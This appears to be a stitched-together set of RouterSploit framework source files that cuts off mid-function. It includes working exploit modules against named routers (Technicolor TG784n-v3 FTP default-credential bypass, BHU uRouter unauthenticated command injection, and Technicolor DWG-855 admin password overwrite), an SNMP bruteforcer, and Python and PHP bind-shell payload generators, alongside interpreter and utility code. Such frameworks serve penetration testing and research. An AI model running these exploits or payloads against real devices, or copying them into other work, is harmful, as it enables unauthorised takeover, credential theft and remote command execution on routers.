import re
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient


class Exploit(FTPClient):
    __info__ = {
        "name": "Technicolor TG784n-v3 Auth Bypass",
        "description": "Module exploits Technicolor TG784n-v3 authentication bypass vulnerability.",
        "authors": (
            "Jose Moreira",  # vulnerability discovery & analysis
            "0BuRner",  # routersploit module
            "Marcin Bury <marcin[at]threat9.com>",  # little fixes
        ),
        "references": (
            "http://modem-help.forum-phpbb.co.uk/t1-fixing-username-password-problems",
            "http://modem-help.forum-phpbb.co.uk/t2-howto-root-tg784",
        ),
        "devices": (
            "Technicolor TG784n-v3",
            "Unknown number of Technicolor and Thompson routers",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(21, "Target FTP port")

    username = OptString("upgrade", "Default FTP username")
    password = OptString("Th0ms0n!", "Default FTP password for \"upgrade\" user")

    def run(self):
        creds = self.get_credentials()
        if creds:
            print_success("Found encrypted credentials:")
            print_table(("Name", "Password", "Role", "Hash2", "Crypt"), *creds)

            print_status("Use javascript console (through developer tools) to bypass authentication:")
            payload = ('var user = "{}"\n'
                       'var hash2 = "{}";\n'
                       'var HA2 = MD5("GET" + ":" + uri);\n'
                       'document.getElementById("user").value = user;\n'
                       'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                       'document.authform.submit();\n')

            for user in creds:
                print_success("User: {} Role: {}".format(user[0], user[2]))
                print_info(payload.format(user[0], user[3]))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        if self.get_credentials():
            return True

        return False

    def get_credentials(self):
        print_status("Trying FTP authentication with Username: {} and Password: {}".format(self.username,
                                                                                           self.password))

        ftp_client = self.ftp_create()
        if ftp_client.login(self.username, self.password):
            print_success("Authentication successful")
            content = self.ftp_get_content(ftp_client, "user.ini")
            creds = re.findall(r"add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n", str(content, "utf-8"))
            return creds
        else:
            print_error("Exploit failed - authentication failed")

        return None



import time
import binascii
from bluepy.btle import Scanner, DefaultDelegate
from .btle_device import Device


class BTLEScanner(Scanner):
    """ Bluetooth Low Energy Scanner """

    def __init__(self, mac=None, iface=0):
        Scanner.__init__(self, iface)
        self.mac = mac

    def _decode_address(self, resp):
        addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
        return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])

    def _find_or_create(self, addr):
        if addr in self.scanned:
            dev = self.scanned[addr]
        else:
            dev = Device(addr, self.iface)
            self.scanned[addr] = dev

        return dev

    def process(self, timeout=10.0):
        start = time.time()

        while True:
            if timeout:
                remain = start + timeout - time.time()
                if remain <= 0.0:
                    break
            else:
                remain = None

            resp = self._waitResp(["scan", "stat"], remain)
            if resp is None:
                break

            respType = resp["rsp"][0]

            if respType == "stat":
                if resp["state"][0] == "disc":
                    self._mgmtCmd("scan")

            elif respType == "scan":
                addr = self._decode_address(resp)

                if not self.mac or addr == self.mac:
                    dev = self._find_or_create(addr)

                    newData = dev._update(resp)

                    if self.delegate:
                        self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), newData)

                    if self.mac and dev.addr == self.mac:
                        break


class ScanDelegate(DefaultDelegate):
    def __init__(self, options):
        DefaultDelegate.__init__(self)
        self.options = options

    def handleDiscovery(self, dev, isNewDev, isNewData):
        if not isNewDev:
            return
        elif self.options.mac and dev.addr != self.options.mac:
            return

        if self.options.buffering:
            dev.print_info()



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    BindTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder


class Payload(BindTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Python Bind TCP",
        "description": "Creates interactive tcp bind shell by using python.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "import socket,os\n" +
            "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
            "so.bind(('0.0.0.0',{}))\n".format(self.rport) +
            "so.listen(1)\n" +
            "so,addr=so.accept()\n" +
            "x=False\n" +
            "while not x:\n" +
            "\tdata=so.recv(1024)\n" +
            "\tstdin,stdout,stderr,=os.popen3(data)\n" +
            "\tstdout_value=stdout.read()+stderr.read()\n" +
            "\tso.send(stdout_value)\n"
        )



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "BHU uRouter RCE",
        "description": "Module exploits BHU uRouter unauthenticated remote code execution vulnerability, which "
                       "allows executing commands on the router with root privileges.",
        "authors": (
            "Tao 'depierre' Sauvage",
        ),
        "references": (
            "http://www.ioactive.com/pdfs/BHU-WiFi_uRouter-Security_Advisory_Final081716.pdf",
        ),
        "devices": (
            "BHU uRouter",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success('Target is vulnerable')
            print_status('Blind command injection - response is not available')
            print_status('Possible extraction point:')
            print_status('\t- Inject "CMD &gt; /usr/share/www/routersploit.check"')
            print_status('\t- The result of CMD will be available at {}:{}/routersploit.check'.format(self.target, self.port))
            print_status("Invoking command loop (type 'exit' or 'quit' to exit the loop)...")
            shell(self, architecture="mipsbe")
        else:
            print_error('Target is not vulnerable')

    def execute(self, cmd):
        headers = {'Content-Type': 'text/xml', 'X-Requested-With': 'XMLHttpRequest'}
        data = '<cmd><ITEM cmd="traceroute" addr="$({})" /></cmd>'.format(cmd)
        self.http_request(
            method="POST",
            path="/cgi-bin/cgiSrv.cgi",
            headers=headers,
            data=data
        )
        return ''  # Blind RCE so no response available

    @mute
    def check(self):
        headers = {'Content-Type': 'text/xml', 'X-Requested-With': 'XMLHttpRequest'}
        data = '<cmd><ITEM cmd="traceroute" addr="$({})" /></cmd>'
        # Blind unauth RCE so we first create a file in the www-root directory
        cmd_echo = data.format(u'echo &quot;$USER&quot; &gt; /usr/share/www/routersploit.check')
        response = self.http_request(
            method="POST",
            path="/cgi-bin/cgiSrv.cgi",
            headers=headers,
            data=cmd_echo
        )
        if not response or u'status="doing"' not in response.text:
            return False
        # Second we check that the file was successfully created
        response = self.http_request(
            method="GET",
            path="/routersploit.check",
        )
        if not response.status_code == 200 or u'root' not in response.text:
            return False
        # Third we clean up the temp file. No need to check if successful since we already check that the device was
        # vulnerable at this point.
        cmd_rm = data.format("rm -f /usr/share/www/routersploit.check")
        self.http_request(
            method="POST",
            path="/cgi-bin/cgiSrv.cgi",
            headers=headers,
            data=cmd_rm
        )
        return True



import threading
import sys
import collections
from weakref import WeakKeyDictionary

try:
    import queue
except ImportError:  # Python 3.x
    import Queue as queue


printer_queue = queue.Queue()
thread_output_stream = WeakKeyDictionary()

PrintResource = collections.namedtuple("PrintResource", ["content", "sep", "end", "file", "thread"])


class PrinterThread(threading.Thread):
    def __init__(self):
        super(PrinterThread, self).__init__()
        self.daemon = True

    def run(self):
        while True:
            content, sep, end, file_, thread = printer_queue.get()
            print(*content, sep=sep, end=end, file=file_)
            printer_queue.task_done()


def __cprint(*args, **kwargs):
    """ Color print()

    Signature like Python 3 print() function
    print([object, ...][, sep=' '][, end='\n'][, file=sys.stdout])
    """
    if not kwargs.pop("verbose", True):
        return

    sep = kwargs.get("sep", " ")
    end = kwargs.get("end", "\n")
    thread = threading.current_thread()
    try:
        file_ = thread_output_stream.get(thread, ())[-1]
    except IndexError:
        file_ = kwargs.get("file", sys.stdout)

    printer_queue.put(PrintResource(content=args, sep=sep, end=end, file=file_, thread=thread))


def print_error(*args, **kwargs) -> None:
    """ Print error message prefixing it with [-]

    """

    __cprint("\033[91m[-]\033[0m", *args, **kwargs)


def print_status(*args, **kwargs) -> None:
    """ Print status message prefixing it with [-]

    """

    __cprint("\033[94m[*]\033[0m", *args, **kwargs)


def print_success(*args, **kwargs) -> None:
    """ Print success message prefixing it with [-]

    """

    __cprint("\033[92m[+]\033[0m", *args, **kwargs)


def print_info(*args, **kwargs) -> None:
    """ Print info message prefixing it with [-]

    """

    __cprint(*args, **kwargs)


def print_table(headers, *args, **kwargs) -> None:
    """ Print table.

    example:

    Name            Current setting     Description
    ----            ---------------     -----------
    option_name     value               description
    foo             bar                 baz
    foo             bar                 baz

    :param headers: Headers names ex.('Name, 'Current setting', 'Description')
    :param args: table values, each element representing one line ex. ('option_name', 'value', 'description), ...
    :param kwargs: 'extra_fill' space between columns, 'header_separator' character to separate headers from content
    :return:
    """
    extra_fill = kwargs.get("extra_fill", 5)
    header_separator = kwargs.get("header_separator", "-")

    if not all(map(lambda x: len(x) == len(headers), args)):
        print_error("Headers and table rows tuples should be the same length.")
        return

    def custom_len(x):
        try:
            return len(x)
        except TypeError:
            return 0

    fill = []
    headers_line = '   '
    headers_separator_line = '   '
    for idx, header in enumerate(headers):
        column = [custom_len(arg[idx]) for arg in args]
        column.append(len(header))

        current_line_fill = max(column) + extra_fill
        fill.append(current_line_fill)
        headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill)))
        headers_separator_line = "".join((
            headers_separator_line,
            "{:<{}}".format(header_separator * len(header), current_line_fill)
        ))

    print_info()
    print_info(headers_line)
    print_info(headers_separator_line)
    for arg in args:
        content_line = "   "
        for idx, element in enumerate(arg):
            content_line = "".join((
                content_line,
                "{:<{}}".format(str(element), fill[idx])
            ))
        print_info(content_line)

    print_info()


def pprint_dict_in_order(dictionary, order=None) -> None:
    """ Pretty dict print.

    Pretty printing dictionary in specific order. (as in 'show info' command)
    Keys not mentioned in *order* parameter will be printed in random order.

    ex. pprint_dict_in_order({'name': John, 'sex': 'male', "hobby": ["rugby", "golf"]}, ('sex', 'name'))

    Sex:
    male

    Name:
    John

    Hobby:
    - rugby
    - golf

    """
    order = order or ()

    def prettyprint(title, body):
        print_info("\n{}:".format(title.capitalize()))
        if not isinstance(body, str):
            for value_element in body:
                print_info("- ", value_element)
        else:
            print_info(body)

    keys = list(dictionary.keys())
    for element in order:
        try:
            key = keys.pop(keys.index(element))
            value = dictionary[key]
        except (KeyError, ValueError):
            pass
        else:
            prettyprint(element, value)

    for rest_keys in keys:
        prettyprint(rest_keys, dictionary[rest_keys])


def color_blue(string: str) -> str:
    """ Returns string colored with blue

    :param str string:
    :return str:
    """

    return "\033[94m{}\033[0m".format(string)


def color_green(string: str) -> str:
    """ Returns string colored with green

    :param str string:
    :return str:
    """

    return "\033[92m{}\033[0m".format(string)


def color_red(string: str) -> str:
    """ Returns string colored with red

    :param str string:
    :return str:
    """

    return "\033[91m{}\033[0m".format(string)



import re

from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "SSDP M-SEARCH Info Discovery",
        "description": "Sends M-SEARCH request to target and retrieve information from UPnP "
                       "enabled systems.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.upnp-hacks.org/upnp.html",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6")
    port = OptPort(1900, "Target UPNP Port")

    def run(self):
        request = (
            "M-SEARCH * HTTP/1.1\r\n" +
            "HOST: {}:{}\r\n".format(self.target, self.port) +
            "MAN: \"ssdp:discover\"\r\n" +
            "MX: 2\r\n" +
            "ST: upnp:rootdevice\r\n\r\n"
        )
        request = bytes(request, "utf-8")

        udp_client = self.udp_create()
        udp_client.send(request)

        response = udp_client.recv(1024)
        if response:
            response = str(response, "utf-8")

            info = {}
            regexps = {
                "server": r"Server:\s*(.*?)\r\n",
                "location": r"Location:\s*(.*?)\r\n",
                "usn": r"USN:\s*(.*?)\r\n",
            }

            for key in regexps.keys():
                res = re.findall(regexps[key], response, re.IGNORECASE)
                if res:
                    info[key] = res[0]
                else:
                    info[key] = ""

            print_status("{}:{} | {} | {} | {}".format(self.target, self.port, info["server"], info["location"], info["usn"]))
        else:
            print_error("Target did not respond to M-SEARCH request")

        udp_client.close()



from routersploit.core.exploit import *
from routersploit.modules.payloads.php.bind_tcp import Payload as PHPBindTCP


class Payload(PHPBindTCP):
    __info__ = {
        "name": "PHP Bind TCP One-Liner",
        "description": "Creates interactive tcp bind shell by using php one-liner.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    cmd = OptString("php", "PHP binary")

    def generate(self):
        self.fmt = self.cmd + ' -r "{}"'
        payload = super(Payload, self).generate()
        return payload



from routersploit.core.exploit import *
from routersploit.core.snmp.snmp_client import SNMPClient
from routersploit.resources import wordlists


class Exploit(SNMPClient):
    __info__ = {
        "name": "SNMP Bruteforce",
        "description": "Module performs bruteforce attack against SNMP service. "
                       "If valid community string is found, it is displayed to the user",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Multiple devices",
        )
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(161, "Target SNMP port")

    version = OptInteger(1, "SNMP version 0:v1, 1:v2c")
    threads = OptInteger(8, "Number of threads")

    defaults = OptWordlist(wordlists.snmp, "SNMP community string or file with default communit stryings (file://)")

    stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Display authentication attempts")

    def run(self):
        self.strings = []
        self.attack()

    @multi
    def attack(self):
        print_status("Starting bruteforce against SNMP service")

        data = LockedIterator(self.defaults)
        self.run_threads(self.threads, self.target_function, data)

        if len(self.strings):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Community String")
            print_table(headers, *self.strings)
        else:
            print_error("Valid community strings not found")

    def target_function(self, running, data):
        while running.is_set():
            try:
                community_string = data.next()

                snmp_client = self.snmp_create()
                if snmp_client.get(community_string, "1.3.6.1.2.1.1.1.0", version=self.version):
                    if self.stop_on_success:
                        running.clear()

                    self.strings.append((self.target, self.port, self.target_protocol, community_string))

            except StopIteration:
                break

    def check(self):
        raise NotImplementedError("Check method is not available")

    @mute
    def check_default(self):
        self.strings = []

        data = LockedIterator(self.defaults)
        self.run_threads(self.threads, self.target_function, data)

        if self.strings:
            return self.strings

        return None



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Technicolor DWG-855 Auth Bypass",
        "description": "Module exploits Technicolor DWG-855 Authentication Bypass "
                       "vulnerability which allows changing administrator's password.\n\n"
                       "NOTE: This module will errase previous credentials, this is NOT stealthy.",
        "authors": (
            "JPaulMora <https://JPaulMora.GitHub.io>",  # vulnerability discovery, initial routersploit module.
            "0BuRner",  # routersploit module
        ),
        "references": (
            "Bug discovered some time before Aug 2016, this is the first reference to it!\n"
            "This exploit works with any POST parameter, but "
            "changing admin creds gives you access to everything else.",
        ),
        "devices": (
            "Technicolor DWG-855",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    nuser = OptString("ruser", "New user (overwrites existing user)")
    npass = OptString("rpass", "New password (overwrites existing password)")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = {
                "HttpUserId": self.nuser,
                "Password": self.npass,
                "PasswordReEnter": self.npass,
                "RestoreFactoryNo": "0x00"
            }

            response = self.http_request(
                method="POST",
                path="/goform/RgSecurity",
                headers=headers,
                data=data
            )

            if response is None:
                print_error("Target did not answer request.")
            elif response.status_code == 401:
                # Server obeys request but then sends unauthorized response.
                # Here we send a GET request with the new creds.
                check_response = self.http_request(
                    method="GET",
                    path="/RgSwInfo.asp",
                    auth=(self.nuser, self.npass)
                )

                if check_response.status_code == 200:
                    print_success("Credentials changed!")
                elif response.status_code == 401:
                    print_error("Target answered, denied access.")
                else:
                    pass
            else:
                print_error("Unknown error.")
        else:
            print_error("Exploit failed - Target seems to be not vulnerable")

    @mute
    def check(self):
        # The check consists in trying to access router resources
        # with incorrect creds. in this case logo.jpg Try it yourself!
        vulnresp = "\x11\x44\x75\x63\x6b\x79\x00"  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"

        response = self.http_request(
            method="GET",
            path="/logo.jpg",
            auth=("", "")
        )
        if response is not None and vulnresp in response.text:
            return True
        else:
            return False



import atexit
import itertools
import pkgutil
import os
import sys
import getopt
import signal
import traceback
import threading, ctypes
from collections import Counter

from routersploit.core.exploit.exceptions import RoutersploitException
from routersploit.core.exploit.utils import (
    index_modules,
    pythonize_path,
    humanize_path,
    import_exploit,
    stop_after,
    module_required,
    MODULES_DIR,
    WORDLISTS_DIR,
)
from routersploit.core.exploit.printer import (
    print_info,
    print_success,
    print_error,
    print_status,
    print_table,
    pprint_dict_in_order,
    PrinterThread,
    printer_queue
)
from routersploit.core.exploit.exploit import GLOBAL_OPTS
from routersploit.core.exploit.payloads import BasePayload

import readline


def is_libedit():
    return isinstance(readline.__doc__, str) and "libedit" in readline.__doc__


class BaseInterpreter:
    history_file = os.path.expanduser("~/.history")
    history_length = 100
    global_help = ""

    def __init__(self):
        self.setup()
        self.banner = ""

    def setup(self):
        """ Initialization of third-party libraries

        Setting interpreter history.
        Setting appropriate completer function.

        :return:
        """
        if not os.path.exists(self.history_file):
            with open(self.history_file, "a+") as history:
                if is_libedit():
                    history.write("_HiStOrY_V2_\n\n")

        readline.read_history_file(self.history_file)
        readline.set_history_length(self.history_length)
        atexit.register(readline.write_history_file, self.history_file)

        readline.parse_and_bind("set enable-keypad on")

        readline.set_completer(self.complete)
        readline.set_completer_delims(" \t\n;")
        if is_libedit():
            readline.parse_and_bind("bind ^I rl_complete")
        else:
            readline.parse_and_bind("tab: complete")

    def parse_line(self, line):
        """ Split line into command and argument.

        :param line: line to parse
        :return: (command, argument, named_arguments)
        """
        kwargs = dict()
        command, _, arg = line.strip().partition(" ")
        args = arg.strip().split()
        for word in args:
            if '=' in word:
                (key, value) = word.split('=', 1)
                kwargs[key.lower()] = value
                arg = arg.replace(word, '')
        return command, ' '.join(arg.split()), kwargs

    @property
    def prompt(self):
        """ Returns prompt string """
        return ">>>"

    def get_command_handler(self, command):
        """ Parsing command and returning appropriate handler.

        :param command: command
        :return: command_handler
        """
        try:
            command_handler = getattr(self, "command_{}".format(command))
        except AttributeError:
            raise RoutersploitException("Unknown command: '{}'".format(command))

        return command_handler

    def start(self):
        """ Routersploit main entry point. Starting interpreter loop. """
        
        if not sys.stdin.isatty():
            print_info("stdin is not a TTY. Ensure `stdin_open` and `tty` are set")
            sys.exit(1)
        
        print_info(self.banner)
        printer_queue.join()
        
        while True:
            try:
                command, args, kwargs = self.parse_line(input(self.prompt))
                if not command:
                    continue
                command_handler = self.get_command_handler(command)
                command_handler(args, **kwargs)
            except RoutersploitException as err:
                print_error(err)
            except (EOFError, SystemExit):
                print_info()
                print_error("RouterSploit stopped")
                os._exit(0)
            except KeyboardInterrupt:
                print_info()
                print_error("Use Ctrl+D to exit")
            finally:
                printer_queue.join()

    def complete(self, text, state):
        """Return the next possible completion for 'text'.

        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            original_line = readline.get_line_buffer()
            line = original_line.lstrip()
            stripped = len(original_line) - len(line)
            start_index = readline.get_begidx() - stripped
            end_index = readline.get_endidx() - stripped

            if start_index > 0:
                cmd, args, _ = self.parse_line(line)
                if cmd == "":
                    complete_function = self.default_completer
                else:
                    try:
                        complete_function = getattr(self, "complete_" + cmd)
                    except AttributeError:
                        complete_function = self.default_completer
            else:
                complete_function = self.raw_command_completer

            self.completion_matches = complete_function(text, line, start_index, end_index)

        try:
            return self.completion_matches[state]
        except IndexError:
            return None

    def commands(self, *ignored):
        """ Returns full list of interpreter commands.

        :param ignored:
        :return: full list of interpreter commands
        """
        return [command.rsplit("_").pop() for command in dir(self) if command.startswith("command_")]

    def raw_command_completer(self, text, line, start_index, end_index):
        """ Complete command w/o any argument """
        return [command for command in self.suggested_commands() if command.startswith(text)]

    def default_completer(self, *ignored):
        return []

    def suggested_commands(self):
        """ Entry point for intelligent tab completion.

        Overwrite this method to suggest suitable commands.

        :return: list of suitable commands
        """
        return self.commands()


class RoutersploitInterpreter(BaseInterpreter):
    history_file = os.path.expanduser("~/.rsf_history")
    global_help = """Global commands:
    help                        Print this help menu
    use <module>                Select a module for usage
    exec <shell command> <args> Execute a command in a shell
    search <search term>        Search for appropriate module
    exit                        Exit RouterSploit"""

    module_help = """Module commands:
    run                                 Run the selected module with the given options
    back                                De-select the current module
    set <option name> <option value>    Set an option for the selected module
    setg <option name> <option value>   Set an option for all of the modules
    unsetg <option name>                Unset option that was set globally
    show [info|options|devices]         Print information, options, or target devices for a module
    check                               Check if a given target is vulnerable to a selected module's exploit"""

    def __init__(self):
        super(RoutersploitInterpreter, self).__init__()
        PrinterThread().start()
        
        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "rsf"
        self.show_sub_commands = ("info", "options", "advanced", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists")
        self.search_sub_commands = ("type", "device", "language", "payload", "vendor")

        self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "])
        self.module_commands = ["run", "back", "set ", "setg ", "check"]
        self.module_commands.extend(self.global_commands)
        self.module_commands.sort()

        self.modules = index_modules()
        self.modules_count = Counter()
        self.modules_count.update([module.split('.')[0] for module in self.modules])
        self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")]

        self.__parse_prompt()

        self.banner = """ ______            _            _____       _       _ _
 | ___ \\          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\\ `--. _ __ | | ___  _| |_
 |    // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __|
 | |\\ \\ (_) | |_| | ||  __/ |  /\\__/ / |_) | | (_) | | |_
 \\_| \\_\\___/ \\__,_|\\__\\___|_|  \\____/| .__/|_|\\___/|_|\\__|
                                     | |
       Exploitation Framework for    |_|    by Threat9
            Embedded Devices

 Codename   : I Knew You Were Trouble
 Version    : 3.4.7
 Homepage   : https://www.threat9.com - @threatnine

 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count}
""".format(exploits_count=self.modules_count["exploits"],
           scanners_count=self.modules_count["scanners"],
           creds_count=self.modules_count["creds"],
           generic_count=self.modules_count["generic"],
           payloads_count=self.modules_count["payloads"],
           encoders_count=self.modules_count["encoders"])

    def __parse_prompt(self):
        raw_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 > "
        raw_prompt_template = os.getenv("RSF_RAW_PROMPT", raw_prompt_default_template).replace('\\033', '\033')
        self.raw_prompt_template = raw_prompt_template if '{host}' in raw_prompt_template else raw_prompt_default_template

        module_prompt_default_template = "\001\033[4m\002{host}\001\033[0m\002 (\001\033[91m\002{module}\001\033[0m\002) > "
        module_prompt_template = os.getenv("RSF_MODULE_PROMPT", module_prompt_default_template).replace('\\033', '\033')
        self.module_prompt_template = module_prompt_template if all(map(lambda x: x in module_prompt_template, ['{host}', "{module}"])) else module_prompt_default_template

    def __handle_if_noninteractive(self, argv):
        """ Keep old method for backward compat only """
        self.nonInteractive(argv)

    def nonInteractive(self, argv):
        """ Execute specific command and return result without launching the interactive CLI

        :return:

        """
        module = ""
        set_opts = []

        try:
            opts, args = getopt.getopt(argv[1:], "hm:s:", ["help=", "module=", "set="])
        except getopt.GetoptError:
            print_info("{} -m <module> -s \"<option> <value>\"".format(argv[0]))
            printer_queue.join()
            return

        for opt, arg in opts:
            if opt in ("-h", "--help"):
                print_info("{} -m <module> -s \"<option> <value>\"".format(argv[0]))
                printer_queue.join()
                return
            elif opt in ("-m", "--module"):
                module = arg
            elif opt in ("-s", "--set"):
                set_opts.append(arg)

        if not len(module):
            print_error('A module is required when running non-interactively')
            printer_queue.join()
            return

        self.command_use(module)

        for opt in set_opts:
            self.command_set(opt)

        self.command_exploit()

        # Wait for results if needed
        printer_queue.join()

        return

    @property
    def module_metadata(self):
        return getattr(self.current_module, "_{}__info__".format(self.current_module.__class__.__name__))

    @property
    def prompt(self):
        """ Returns prompt string based on current_module attribute.

        Adding module prefix (module.name) if current_module attribute is set.

        :return: prompt string with appropriate module prefix.
        """
        if self.current_module:
            try:
                return self.module_prompt_template.format(host=self.prompt_hostname, module=self.module_metadata['name'])
            except (AttributeError, KeyError):
                return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
        else:
            return self.raw_prompt_template.format(host=self.prompt_hostname)

    def available_modules_completion(self, text):
        """ Looking for tab completion hints using setup.py entry_points.

        May need optimization in the future!

        :param text: argument of 'use' command
        :return: list of tab completion hints
        """
        text = pythonize_path(text)
        all_possible_matches = filter(lambda x: x.startswith(text), self.modules)
        matches = set()
        for match in all_possible_matches:
            head, sep, tail = match[len(text):].partition('.')
            if not tail:
                sep = ""
            matches.add("".join((text, head, sep)))
        return list(map(humanize_path, matches))  # humanize output, replace dots to forward slashes

    def suggested_commands(self):
        """ Entry point for intelligent tab completion.

        Based on state of interpreter this method will return intelligent suggestions.

        :return: list of most accurate command suggestions
        """
        if self.current_module and GLOBAL_OPTS:
            return sorted(itertools.chain(self.module_commands, ("unsetg ",)))
        elif self.current_module:
            return self.module_commands
        else:
            return self.global_commands

    def command_back(self, *args, **kwargs):
        self.current_module = None

    def command_use(self, module_path, *args, **kwargs):
        module_path = pythonize_path(module_path)
        module_path = ".".join(("routersploit", "modules", module_path))
        # module_path, _, exploit_name = module_path.rpartition('.')
        try:
            self.current_module = import_exploit(module_path)()
        except RoutersploitException as err:
            print_error(str(err))

    @stop_after(2)
    def complete_use(self, text, *args, **kwargs):
        if text:
            return self.available_modules_completion(text)
        else:
            return self.main_modules_dirs

    def __command_sigint_handler(self, signum, frame):
        raise KeyboardInterrupt

    @module_required
    def command_run(self, *args, **kwargs):
        print_status("Running module {}...".format(self.current_module))
        try:
            signal.signal(signal.SIGINT, self.__command_sigint_handler)
            self.current_module.run()
        except KeyboardInterrupt:
            print_info()
            print_error("Operation cancelled by user")
        except Exception:
            print_error(traceback.format_exc(sys.exc_info()))
        finally:
            signal.signal(signal.SIGINT, signal.getsignal(signal.SIGINT))


    def command_exploit(self, *args, **kwargs):
        self.command_run()

    @module_required
    def command_set(self, *args, **kwargs):
        key, _, value = args[0].partition(" ")
        if key in self.current_module.options:
            setattr(self.current_module, key, value)
            self.current_module.exploit_attributes[key][0] = value

            if kwargs.get("glob", False):
                GLOBAL_OPTS[key] = value
            print_success("{} => {}".format(key, value))
        else:
            print_error("You can't set option '{}'.\n"
                        "Available options: {}".format(key, self.current_module.options))

    @stop_after(2)
    def complete_set(self, text, *args, **kwargs):
        if text:
            return [" ".join((attr, "")) for attr in self.current_module.options if attr.startswith(text)]
        else:
            return self.current_module.options

    @module_required
    def command_setg(self, *args, **kwargs):
        kwargs['glob'] = True
        self.command_set(*args, **kwargs)

    @stop_after(2)
    def complete_setg(self, text, *args, **kwargs):
        return self.complete_set(text, *args, **kwargs)

    @module_required
    def command_unsetg(self, *args, **kwargs):
        key, _, value = args[0].partition(' ')
        try:
            del GLOBAL_OPTS[key]
        except KeyError:
            print_error("You can't unset global option '{}'.\n"
                        "Available global options: {}".format(key, list(GLOBAL_OPTS.keys())))
        else:
            print_success({key: value})

    @stop_after(2)
    def complete_unsetg(self, text, *args, **kwargs):
        if text:
            return [' '.join((attr, "")) for attr in GLOBAL_OPTS.keys() if attr.startswith(text)]
        else:
            return list(GLOBAL_OPTS.keys())

    @module_required
    def get_opts(self, *args):
        """ Generator returning module's Option attributes (option_name, option_value, option_description)

        :param args: Option names
        :return:
        """
        for opt_key in args:
            try:
                opt_description = self.current_module.exploit_attributes[opt_key][1]
                opt_display_value = self.current_module.exploit_attributes[opt_key][0]
                if self.current_module.exploit_attributes[opt_key][2]:
                    continue
            except (KeyError, IndexError, AttributeError):
                pass
            else:
                yield opt_key, opt_display_value, opt_description

    @module_required
    def get_opts_adv(self, *args):
        """ Generator returning module's advanced Option attributes (option_name, option_value, option_description)

        :param args: Option names
        :return:
        """
        for opt_key in args:
            try:
                opt_description = self.current_module.exploit_attributes[opt_key][1]
                opt_display_value = self.current_module.exploit_attributes[opt_key][0]
            except (KeyError, AttributeError):
                pass
            else:
                yield opt_key, opt_display_value, opt_description

    @module_required
    def _show_info(self, *args, **kwargs):
        pprint_dict_in_order(
            self.module_metadata,
            ("name", "description", "devices", "authors", "references"),
        )
        print_info()

    @module_required
    def _show_options(self, *args, **kwargs):
        target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
        target_opts = [opt for opt in self.current_module.options if opt in target_names]
        module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
        headers = ("Name", "Current settings", "Description")

        print_info("\nTarget options:")
        print_table(headers, *self.get_opts(*target_opts))

        if module_opts:
            print_info("\nModule options:")
            print_table(headers, *self.get_opts(*module_opts))

        print_info()

    @module_required
    def _show_advanced(self, *args, **kwargs):
        target_names = ["target", "port", "ssl", "rhost", "rport", "lhost", "lport"]
        target_opts = [opt for opt in self.current_module.options if opt in target_names]
        module_opts = [opt for opt in self.current_module.options if opt not in target_opts]
        headers = ("Name", "Current settings", "Description")

        print_info("\nTarget options:")
        print_table(headers, *self.get_opts(*target_opts))

        if module_opts:
            print_info("\nModule options:")
            print_table(headers, *self.get_opts_adv(*module_opts))

        print_info()

    @module_required
    def _show_devices(self, *args, **kwargs):  # TODO: cover with tests
        try:
